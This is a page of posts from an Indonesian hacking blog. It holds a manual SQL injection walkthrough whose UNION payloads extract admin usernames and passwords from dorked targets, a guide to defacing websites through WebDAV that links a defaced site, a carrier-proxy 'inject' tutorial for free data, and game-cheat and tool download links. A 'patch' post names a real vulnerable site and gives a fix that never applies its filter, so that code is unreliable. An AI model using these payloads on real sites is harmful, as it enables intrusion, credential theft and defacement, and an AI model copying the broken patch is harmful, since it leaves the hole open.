Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Sunday, 9 February 2014

Cara Membuat Inject SSH Simple Gratis

View Article
assalamualaikum wr Wb ^_^
^_^ ketemu lagi ye ma ane yang ganteng ini :v :v
ane mau bagi2 cara buat Inject SSH nih :D
Buat yang Mastah Lewat aje ye :p

oke langsung aje ^_^

Dalam membuat aplikasi injector yang harus patut kita ketahui adalah alamat proxy provider dan portnya dan juga http header yang nantinya untuk proses injeksi ke proxy provider. Aplikasi injcetor sebenarnya adalah sebuah aplikasi server proxy sederhana yang di modifikasi sedemikian rupa untuk memanipulasi data yang akan di kirim ke proxy provider. Setiap provider akan berbeda topologi / alur modifikasi pengiriman data nya tapi bila anda sudah tau dasar dari aplikasi ini anda bisa dengan mudah menyesuaikan dengan provider yang anda gunakan.

Dalam studi kasus ini Ane mengambil sample provider XL dan menggunakan pemrogramam Visual Basic, dan sekali lagi kalau anda sudah paham dasarnya ente bisa implementasikan dengan semua bahasa pemrograman , baik delphi,c#/c++,phyton bahkan java. Di sini ane tidak hanya akan memberikan source code nya saja tetapi beserta penjelasanya jadi ente tau apa sebenarnya yang terjadi dalam setiap prosesnya dan bisa menyimpulkan dasar dari sebuah aplikasi injector, karena di sini ane tidak mengajarkan ente untuk membuat aplikasi instan tapi mengajarkan ente utnuk mengetahui bagai mana sistrem kerja proxy dan membuat aplikasinya dengan benar.

Sebelum kita mulai kita harus mengetahui hal sebagi berikut:

Studikasus Provider XL

IP proxy = 202.152.240.50

Port proxy = 8080

Data header injeksi = “DELETE http://news.okezone.com/ HTTP/1.1" & vbCr & "Host:news.okezone.com" & vbCr & vbCr”

Open Visual basic nya ^_^
Buat yang Belum Punya Download Di sini >> Visual Basic Full Version
Mulailah dengan project baru, pilih standar EXE 
Lihat Gambar Di bawah ini sebagai contoh ^_^



8 Ball Pool Hack 100% Work ( NEW 2014 )

View Article
Welcome To My Blog..

Download Tools Click Here

Look Video CLICK HERE

The Dark Of Life ^_^

Wednesday, 15 January 2014

SQL INJECTION MANUAL

View Article
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

Dork Di google banyak :p


===========
=step Satu:=
===========

carilah target
misal:

Code:

[site]/berita.php?id=100



Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:

Code:

[site]/berita.php?id=100' atau
[site]/berita.php?id=-100



sehingga muncul pesan error.


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:

Code:

[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*



ceklah secara step by step (satupersatu)...
misal:

Code:

[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--



sehingga muncul error atau hilang pesan error...
misal:

Code:
[site]/berita.php?id=-100+order+by+9--



berarti yang kita ambil adalah sampai angka 8
menjadi :

Code:

[site]/berita.php?id=-100+order+by+8--




===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--



ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--



lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah

Code:
From+Information_schema..




============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--


seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--



=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--



pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :


contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--



============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--



contoh kata yang keluar adalah id,username,password

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login :piss: tapi saya sarankan memakai schemafuzz.py untuk hasil yg lebih maksimal.


agak Rumit Ye ^_^
namanya juga SQLI  skill Mu :p

                  THE DARK OF LIFE ^_^ < Our Band
#Human Edo Tensei 

Cara Deface Dengan WEBDAV MANUAL

View Article

Oke lah Bro Ketemu lagi ma ane :D
Moga2 ente smua gak bosen ye ^_^

#Human Edo Tensei
heheh

ane Punya trick cara deface menggunakan webdav tanpa tools alias manual aje
ckckckck :D
ini trik dari om Lukman a.k.a ./SomeOne ckckck :p
ya udah lah langsung ae di simak ^_^
Titip GAYHODUS BLACKHAT ya ^_^

Pertama
pastinya niat dan dork
Dork simple aje ye atau cari di gugle banyak :v

nih dork dari ane
inurl:/hmei7.asp;.txt <opps ini sih bisa langsung tambah aje di belakang web nya :v
Tanpa pakai tools juga -_- :v :v :v

Next
masuk ke Start - My Network Places
Lihat gambar ini kalau kurang jelas




Next klik Add a Network Place
klik next jangan lupa :p






klik next lagi :D





Nah lalu Muncul seperti gambar di bawah ini
isikan Web Targetnya :D xD ^_^ lalu klik next :D



lalu klik finish :D
and Klik folder yang muncul :D



nah drag deh hasil script deface mu ^_^
untuk Opennya :D klik dua kli aje atau klik kanan open :D




Nah ini hasilnya :D

http://finance.cedare.int/testtutorwebdavmanualxd.html


dah Segitu aje ^_^
ane ganteng xD #AW



Monday, 13 January 2014

Gr3eNox Exploit Scanner

View Article


Oke Bro 
ane mau Bagi2 Tools Yang dah Banyak di Google :3 
tapi gpp lah ane share aje :3
kali aje masih ada yang belum tau ^_^

dah langsung aje di Sedot :p


DOWNLOAD

Semoga Bermanfaat ^_^

Daftar Isi

View Article

Friday, 23 August 2013

Patch Bug SQLI

View Article

Assalamualaikum Wr Wb

Hey Sobat2ku Apa kabarnya :)
baik2 aja kan
udah Lama nih ISCT gak share2 Tutorial2 anu anu heheh :D
gara2 Game :p 
ya udah lah gak usah banyak basa basi :D

Seperti Judulnya Patch Bug Sqli 
Banyak yang bisa Deface tapi belum tentu Bisa patch :)
nah kali ini ane mau kasih tau ,, yang ane tau tentang patch yang biasa ane lakuin :D
hehehe :D

Nih Contohnya sob heheh , ane menemukan bug pada salah satu website negara India :D lagi random :D

ini alamatnya >> http://www.radiancetour.in/foreigntours_details.php?content_id=12
jika di tambahkan string ' (kutip ganda) akan memperoelah hasil erorr pada Mysqlnya :D kira-kira seperti ini penampakannya
Notice: Use of undefined constant SB_TBL_DYNAMIC - assumed 'SB_TBL_DYNAMIC' in /home/content/29/6201829/html/radiancetour/foreigntours_details.php on line 99

Warning : mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/content/29/6201829/html/radiancetour/foreigntours_details.php on line 99

www.isct.hol.es
Patch Bug Sqli - ISCT
Lihat tuh Gambarnya di atas Kalau Kurang jelas :p
Tuh Kan Keliatan :D tandanya websitenya Vuln Tuh :D Hehehe
Ingat lho di patch jangan di pepes :p 

tuh dapet kita simpulkan kalau errornya ada di foreigntours_details.php
yuk langsung di check anunya :D 

 <?php
$content=mysql_fetch_object(mysql_query("SELECT * FROM ".SB_TBL_DYNAMIC." WHERE content_id ='".$_GET['content_id']."'")); ?>
                        
Jelaskan  terlihat bahwa pada content_id tidak ada filternya :D wajar aja kalau Sitenya kepepes terus =D =D selanjutnya mari kita kasih filter, Tambahkan Code ini di dalam Filenya,
 Code:
 <?php
error_reporting(0);

function filtering($content_id){
$idf = mysql_real_escape_string($content_id);
if (!ctype_digit($idf) || $idf < 0){ exit; } else { return $content_id; } } $id = $_GET['content_id'];

 Kira-kira menjadi seperti ini :

<?php
error_reporting(0);

function filtering($content_id){
$idf = mysql_real_escape_string($content_id);
if (!ctype_digit($idf) || $idf < 0){ exit; } else { return $content_id; } } $id = $_GET['content_id']; $content=mysql_fetch_object(mysql_query("SELECT * FROM ".SB_TBL_DYNAMIC." WHERE content_id ='".$_GET['content_id']."'")); ?>

www.isct.hol.es
Patch Buq Sqli - ISCT


wokehh sekian terimakasih buat perhatiannya :D
dan Kunjungannya

Ini cara yang ane tau mungkin cara ente berbeda :)
Maklum2 ya kalau ada salah :D
masih newbie :D

++++++++ SEMOGA BERMANFAAT+++++++
Indonesian Secret Cyber Team - White Hat

Sunday, 17 March 2013

Hack 8 ball Pool Coin

View Article
Assalamualaikum WR WB
sesuai ama janji ane Ane bakalan Ngasih Cheat 8 ball Pool Coin

tau dah neh cheat Work apa gak kalau di ente..
tapi di ane si work walaupun gak permanen
tapi hasil menangnya Buat kita...

Udah nggk usah banyak basa basi langsung aja watch on youtube


>>>> Click  YOUTUBE <<<< Click

Oh Iya ane Lupa Share Cara Debugnya Biar Cheatnya Aktif hehe..
ntar aja deh Itu mah Minggu Depan xD

Thanx Semoga Bermanfaat